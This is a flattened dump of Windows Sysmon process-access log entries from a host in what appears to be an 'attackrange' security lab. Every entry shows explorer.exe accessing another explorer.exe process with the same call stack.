16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 